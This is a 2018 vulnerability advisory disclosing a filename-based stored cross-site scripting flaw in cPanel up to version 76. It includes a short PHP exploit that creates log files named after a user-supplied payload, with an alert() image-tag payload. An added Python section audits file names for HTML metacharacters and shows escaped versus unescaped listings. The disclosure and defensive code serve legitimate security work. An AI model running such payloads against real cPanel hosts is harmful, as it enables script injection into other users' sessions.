cPanel 76 Cross Site Scripting
Source: root@numanozdemir.com Author: OZDEMIR Published: 2018-08-16
[+] Title: cPanel Filename Based Stored XSS <= v76

[+] Author: Numan OZDEMIR

[+] Vendor Homepage: cpanel.com

[+] Version: Up to v76.

[+] Discovered by Numan OZDEMIR in InfinitumIT Labs

[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:
An attacker can run JavaScript code on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html

[~] How to Reproduce:
Create a file whose name is your payload in the /home/user/logs directory,
or run this PHP exploit:

<center>
<?php
// The file name is taken verbatim from the form field.
$p = $_POST['payload'];
$x = get_current_user();
$dir = "/home/".$x."/logs/";
if($_POST){
    // touch() creates an empty file in the logs directory named after the payload.
    if(touch($dir.$p)){
        die(' Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html ');
    }else{
        die('An error occured.');
    }
}else{
    echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>';
} // end of the script.
?>

Note: This exploit cannot create a file whose name contains a / (slash) character.

This vulnerability is disclosed with the cPanel Team's confirmation.

// for secure days...
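For defenders, the following is an added example, not code from the advisory or from cPanel: it audits a logs directory for file names containing HTML metacharacters and shows a file listing rendered without and with output encoding. The function names and the listing markup are hypothetical, since the advisory does not show how cPanel builds the page, and the sample file names are constructed.

```python
import html
import os
import tempfile
import urllib.parse

# Characters that let a file name break out of HTML text or attribute context.
HTML_META = set("<>\"'&")


def suspicious_names(directory):
    """Return the names in `directory` that contain HTML metacharacters."""
    with os.scandir(directory) as entries:
        return sorted(e.name for e in entries if HTML_META & set(e.name))


def render_listing(names, escape=True):
    """Build an HTML list of links to log files (hypothetical renderer).

    escape=False pastes the raw name into the markup, the flaw class the
    advisory describes. escape=True percent-encodes the name for the URL
    and HTML-encodes it for the attribute and the link text.
    """
    rows = []
    for name in names:
        if escape:
            href = html.escape(urllib.parse.quote(name), quote=True)
            label = html.escape(name, quote=True)
        else:
            href = label = name
        rows.append(f'<li><a href="{href}">{label}</a></li>')
    return "<ul>\n" + "\n".join(rows) + "\n</ul>"


def demo():
    """Create constructed sample files, audit them, render both ways."""
    # Constructed names: an ordinary log and the advisory's placeholder payload.
    names = ["example.com-Aug-2018.gz", "<img src onerror=alert(2)>"]
    with tempfile.TemporaryDirectory() as logs:
        for name in names:
            open(os.path.join(logs, name), "w").close()
        flagged = suspicious_names(logs)
    return flagged, render_listing(names, escape=False), render_listing(names)


if __name__ == "__main__":
    flagged, unsafe_html, safe_html = demo()
    print("flagged:", flagged)
    print(unsafe_html)
    print(safe_html)
```

On a shared host, `suspicious_names` can be pointed at each user's logs directory to flag file names that warrant review before the listing page is opened.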
